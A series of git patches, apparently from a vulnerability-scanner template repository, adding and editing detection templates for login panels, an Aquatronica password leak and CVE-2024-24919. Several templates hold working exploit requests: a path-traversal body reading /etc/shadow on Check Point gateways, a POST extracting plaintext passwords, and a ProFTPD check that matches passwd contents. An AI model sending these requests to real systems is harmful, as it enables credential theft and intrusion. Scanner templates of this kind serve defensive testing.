resp = conn.RecvFullString(); + if (resp.includes("ProFTPD 1.3.3c")) + { + for (let i = 0; i < data.length; i++) + { + conn.Send(data[i]); + console.log('Sending:', data[i]); + let resp = conn.RecvFullString(); + resp + } + } else + { + exit(); + } + + args: + Host: "{{Host}}" + Port: 21 + + matchers: + - type: dsl + dsl: + - "success == true" + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file From 3bb283ae56cde48bfaffc809fea6c870595fe166 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 3 Jun 2024 19:51:56 +0200 Subject: [PATCH 1712/1768] Add files via upload --- .../oracle-business-intelligence.yaml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index a3e69607ab..71752d1d94 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -2,7 +2,7 @@ id: oracle-business-intelligence info: name: Oracle Business Intelligence Login Panel - Detect - author: DhiyaneshDk + author: DhiyaneshDk,righettod severity: info description: Oracle Business Intelligence login panel was detected. classification: @@ -15,12 +15,16 @@ info: shodan-query: http.title:"Oracle Business Intelligence Sign In" vendor: oracle verified: true - tags: panel,oracle + tags: panel,oracle,login,detect http: - method: GET path: - "{{BaseURL}}/saw.dll?bieehome&startPage=1" + - "{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1" + - "{{BaseURL}}/analytics/saw.dll?Dashboard" + + stop-at-first-match: true matchers-condition: and matchers: @@ -28,8 +32,11 @@ http: part: body words: - "Oracle Business Intelligence Sign In" + - "Oracle Business Intelligence" + - "Oracle BI Presentation Services" + - "use Oracle BIEE" + condition: or - type: status status: - - 200 -# digest: 490a0046304402202d0f0872dc31339928d9204b365b95146aa2b96c875d64296ccd38a80719532f0220779348cd01ae70306abf69124771b2cc0699688635ed4fb3e1e8b292483cf211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 \ No newline at end of file From 41352d992a9d939e0c79f8850e7f5cc77891e27a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 3 Jun 2024 19:53:17 +0200 Subject: [PATCH 1713/1768] Add reference attribute --- http/exposed-panels/oracle-business-intelligence.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 71752d1d94..0abbd2ab1d 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk,righettod severity: info description: Oracle Business Intelligence login panel was detected. + reference: + - https://www.oracle.com/business-analytics/business-intelligence/technologies/bi.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From da776929c49ecf39c13ade19fbd2335a7c10b861 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 3 Jun 2024 21:01:00 +0300 Subject: [PATCH 1714/1768] add aquatronica control system --- .../aquatronica-password-disclosure.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/vulnerabilities/other/aquatronica-password-disclosure.yaml diff --git a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml b/http/vulnerabilities/other/aquatronica-password-disclosure.yaml new file mode 100644 index 0000000000..577ba53376 --- /dev/null +++ b/http/vulnerabilities/other/aquatronica-password-disclosure.yaml @@ -0,0 +1,37 @@ +id: aquatronica-password-disclosure + +info: + name: Aquatronica Control System 5.1.6 - Information Disclosure + author: securityforeveryone + severity: high + description: | + The tcp.php endpoint on the Aquatronica controller is exposed to unauthenticated attackers over the network. This vulnerability allows remote attackers to send a POST request which can reveal sensitive configuration information, including plaintext passwords. This can lead to unauthorized access and control over the aquarium controller, compromising its security and potentially allowing attackers to manipulate its settings. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php + - https://www.exploit-db.com/exploits/52028 + metadata: + verified: true + max-request: 1 + shodan-query: html:"aquatronica" + tags: exploitdb,aquatronica + +http: + - raw: + - | + POST /tcp.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG + + matchers-condition: and + matchers: + - type: word + words: + - "WEB_PASSWORD" + - "pwd="" + condition: and + + - type: status + status: + - 200 From 605438c6da7cda4f4e93181411d6cd2d77275fd1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 23:32:28 +0530 Subject: [PATCH 1715/1768] Create cox-business-panel.yaml --- http/exposed-panels/cox-business-panel.yaml | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/cox-business-panel.yaml diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml new file mode 100644 index 0000000000..dc96a8c3f5 --- /dev/null +++ b/http/exposed-panels/cox-business-panel.yaml @@ -0,0 +1,34 @@ +id: cox-business-panel + +info: + name: Cox Business Dominion Gateway Login - Panel + author: DhiyaneshDK + severity: info + description: | + Cox Business Dominion Gateway Login page was discovered. + reference: + - https://samcurry.net/hacking-millions-of-modems + metadata: + verified: true + max-request: 1 + shodan-query: html:"Cox Business" + tags: cox,gateway,login,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cox Business Dominion Gateway - Login" + + - type: status + status: + - 200 From 15a82485907425025a53e594ecc2f78847b23dda Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 11:52:19 +0530 Subject: [PATCH 1716/1768] minor update --- ...a-password-disclosure.yaml => aquatronica-info-leak.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename http/vulnerabilities/other/{aquatronica-password-disclosure.yaml => aquatronica-info-leak.yaml} (91%) diff --git a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml b/http/vulnerabilities/other/aquatronica-info-leak.yaml similarity index 91% rename from http/vulnerabilities/other/aquatronica-password-disclosure.yaml rename to http/vulnerabilities/other/aquatronica-info-leak.yaml index 577ba53376..a589de46cc 100644 --- a/http/vulnerabilities/other/aquatronica-password-disclosure.yaml +++ b/http/vulnerabilities/other/aquatronica-info-leak.yaml @@ -1,4 +1,4 @@ -id: aquatronica-password-disclosure +id: aquatronica-info-leak info: name: Aquatronica Control System 5.1.6 - Information Disclosure @@ -9,11 +9,12 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php - https://www.exploit-db.com/exploits/52028 + - https://www.zeroscience.mk/codes/aqua.txt metadata: verified: true max-request: 1 shodan-query: html:"aquatronica" - tags: exploitdb,aquatronica + tags: exploitdb,aquatronica,info-leak http: - raw: From 2268f9afb97964c28c0da48efb07a003eb33dac6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 12:33:25 +0530 Subject: [PATCH 1717/1768] minor update --- http/cves/2024/CVE-2024-24919.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 70d85637df..598f70da74 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -10,12 +10,15 @@ info: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: + verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway + shodan-query: + - html:"Check Point SSL Network" + - http.html:"check point ssl network" + fofa-query: body="check point ssl network" cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* - shodan-query: html:"Check Point SSL Network" - verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -23,12 +26,10 @@ http: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7 - Content-Length: 39 Accept-Encoding: gzip - Connection: close aCSHELL/../../../../../../../etc/shadow + matchers-condition: and matchers: - type: regex From ba94ac01ee124eab5ac1689c7f2668150caa8f81 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 07:12:47 +0000 Subject: [PATCH 1718/1768] Auto Generated New Template Addition List [Tue Jun 4 07:12:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a025f3b8c0..cd62c442a4 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml +http/cves/2024/CVE-2024-27348.yaml http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-3822.yaml From 156eb0b2a251f3d2c91399e87a1f4a7bb388439c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 07:12:53 +0000 Subject: [PATCH 1719/1768] Auto Generated Templates Checksum [Tue Jun 4 07:12:53 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49882b27ee..02b7421015 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:6c374eeb1f547d318a2f0d87d01236bef68c380c -cves.json-checksum.txt:0b1d7e32abf421aa809f190ddd8f70823694eb05 +cves.json:ee679e39399a1034603fc71366f0ce86effc9394 +cves.json-checksum.txt:0650e06b1d0806329262c0f0bb6b558ddd1ac707 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3279,14 +3279,14 @@ http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff -http/cves/2024/CVE-2024-24919.yaml:59be299acfb1747ce7401170404292e788d0a822 +http/cves/2024/CVE-2024-24919.yaml:76513c240417ed04c64daf40bfb3ec04d9f2ac28 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d -http/cves/2024/CVE-2024-27348.yaml:b6afd2794a4897d3ea0154168726979ebd947dc6 +http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 @@ -8622,7 +8622,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2b8fbacfb2772cd3809af3bccae99ba38931ed8e +templates-checksum.txt:86d8a8d0c31136a3086c0b3408dc5f9208f8e3f7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2823a71e5efc09d3e19cc3682e655be530881e29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 07:13:26 +0000 Subject: [PATCH 1720/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9337c8a45f..b333fabf2d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-24919.yaml' + - 'http/cves/2024/CVE-2024-27348.yaml' - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-3822.yaml' From 798fa434f8ccc1ba3aec9c5d61514cc5ab06aa5d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 07:14:38 +0000 Subject: [PATCH 1721/1768] Auto Template Signing [Tue Jun 4 07:14:38 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24919.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 598f70da74..a92dc09e7c 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a0d1070c7111ef0e84e99df831db36199363b5f5 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 4 Jun 2024 10:27:01 +0200 Subject: [PATCH 1722/1768] Add files via upload --- http/technologies/tech-detect.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 376458562a..66215090c1 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -2243,6 +2243,14 @@ http: condition: or part: body + - type: word + name: ibm-websphere-application-server + words: + - '$wsep:' + - '$WSEP:' + condition: or + part: all_headers + - type: regex name: bootstrap regex: From c90632de186a2015707f3186ecc4482f00887da0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 14:43:34 +0530 Subject: [PATCH 1723/1768] add intrusive tag --- http/cves/2024/CVE-2024-4358.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 32f7e2d3b0..b2e32509c0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Log in | Telerik Report Server" verified: true max-request: 2 - tags: cve,cve2024,telerik,progress,auth-bypass + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive variables: user: "{{rand_base(6)}}" From 1a09b4866f2ae0142840565515fb3a70b1f286f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:20:07 +0000 Subject: [PATCH 1725/1768] Auto Generated Templates Checksum [Tue Jun 4 17:20:07 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 02b7421015..aa58b932cd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3279,7 +3279,7 @@ http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff -http/cves/2024/CVE-2024-24919.yaml:76513c240417ed04c64daf40bfb3ec04d9f2ac28 +http/cves/2024/CVE-2024-24919.yaml:32ba8338c24aa5d9b6bc4780c00087a850faabe8 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 @@ -4200,7 +4200,7 @@ http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 -http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 +http/exposed-panels/oracle-business-intelligence.yaml:64437a135a00da2b4507b35088c2fdfd6527e11a http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a @@ -8622,7 +8622,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:86d8a8d0c31136a3086c0b3408dc5f9208f8e3f7 +templates-checksum.txt:eab2daf18d55673ee74262a059774768fe74473f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9595c06ac5fda54b909a592ceaf679e19dc5d945 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 4 Jun 2024 22:50:32 +0530 Subject: [PATCH 1726/1768] Update cox-business-panel.yaml --- http/exposed-panels/cox-business-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml index dc96a8c3f5..3a0d5192d3 100644 --- a/http/exposed-panels/cox-business-panel.yaml +++ b/http/exposed-panels/cox-business-panel.yaml @@ -1,7 +1,7 @@ id: cox-business-panel info: - name: Cox Business Dominion Gateway Login - Panel + name: Cox Business Dominion Gateway Login Panel - Detect author: DhiyaneshDK severity: info description: | From 0c50e82625e7e727a4d80edd8fcd413a45fbad95 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:21:48 +0000 Subject: [PATCH 1727/1768] Auto Template Signing [Tue Jun 4 17:21:47 UTC 2024] :robot: --- http/exposed-panels/oracle-business-intelligence.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 0abbd2ab1d..5efc63b867 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -41,4 +41,5 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 490a0046304402201ada524d94f69695b6669c32f450046adc94781b54b39fe4d0ad1d262ca58b3e022027fa8cd7e5ab135d2e757ae8e8c27701fa60c3372619d4f0b974c78bc53bb4f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a67ed5d632bd8a7da31d09059b60a57700236123 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:22:29 +0000 Subject: [PATCH 1728/1768] Auto Generated New Template Addition List [Tue Jun 4 17:22:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd62c442a4..b3c55eab83 100644 --- a/.new-additions +++ b/.new-additions @@ -59,6 +59,7 @@ http/misconfiguration/installer/wowonder-installer.yaml http/technologies/cowboy-detect.yaml http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml +http/vulnerabilities/other/aquatronica-info-leak.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml network/detection/bitvise-ssh-detect.yaml From 21c8efa5b34e4ffc42db28981a05d66f28ede542 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:22:34 +0000 Subject: [PATCH 1729/1768] Auto Generated Templates Checksum [Tue Jun 4 17:22:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index aa58b932cd..49b6f03be8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4200,7 +4200,7 @@ http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 -http/exposed-panels/oracle-business-intelligence.yaml:64437a135a00da2b4507b35088c2fdfd6527e11a +http/exposed-panels/oracle-business-intelligence.yaml:4f19eda18cffc99d834727c4aa620adeb4a2e486 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a @@ -7715,6 +7715,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e +http/vulnerabilities/other/aquatronica-info-leak.yaml:78987131bb50f9efbdcf8f4c060c696627287557 http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a @@ -8622,7 +8623,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eab2daf18d55673ee74262a059774768fe74473f +templates-checksum.txt:7f1469bfc3e1eca28e5b74a5ebf4935755687a27 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eb7a55f147490bb35469ef9cfb778f793c303d30 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:23:10 +0000 Subject: [PATCH 1730/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b333fabf2d..2b85aef4a8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -64,6 +64,7 @@ on: - 'http/technologies/cowboy-detect.yaml' - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' + - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - 'network/detection/bitvise-ssh-detect.yaml' From baacd03135676b6c45fd4ccbf9ffee978673ded8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:24:15 +0000 Subject: [PATCH 1731/1768] Auto Generated New Template Addition List [Tue Jun 4 17:24:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b3c55eab83..244353d905 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml +http/exposed-panels/cox-business-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/oracle-access-management.yaml From d0dccc286e08312e1e4617bbb942d5077608e8a8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:24:20 +0000 Subject: [PATCH 1732/1768] Auto Generated Templates Checksum [Tue Jun 4 17:24:20 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49b6f03be8..92e6563fa3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3729,6 +3729,7 @@ http/exposed-panels/corebos-panel.yaml:f5c97e99526a78856683eab9bead66f41151d5bb http/exposed-panels/cortex-xsoar-login.yaml:73c55686323fbaf56a48c90d96ca1a55295d78f6 http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e39697d http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 +http/exposed-panels/cox-business-panel.yaml:57fc005509d4bf4caa98e0c3a179742bb3d29b09 http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 @@ -8623,7 +8624,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f1469bfc3e1eca28e5b74a5ebf4935755687a27 +templates-checksum.txt:4aee2cd5329b91b6d4668bdb739a2bc53ee41b4b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 123bc0d0dd6cf11e2b9eb2aa742bc3bf8fe00c2d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:24:22 +0000 Subject: [PATCH 1733/1768] Auto Template Signing [Tue Jun 4 17:24:22 UTC 2024] :robot: --- http/vulnerabilities/other/aquatronica-info-leak.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/aquatronica-info-leak.yaml b/http/vulnerabilities/other/aquatronica-info-leak.yaml index a589de46cc..d9ce12e678 100644 --- 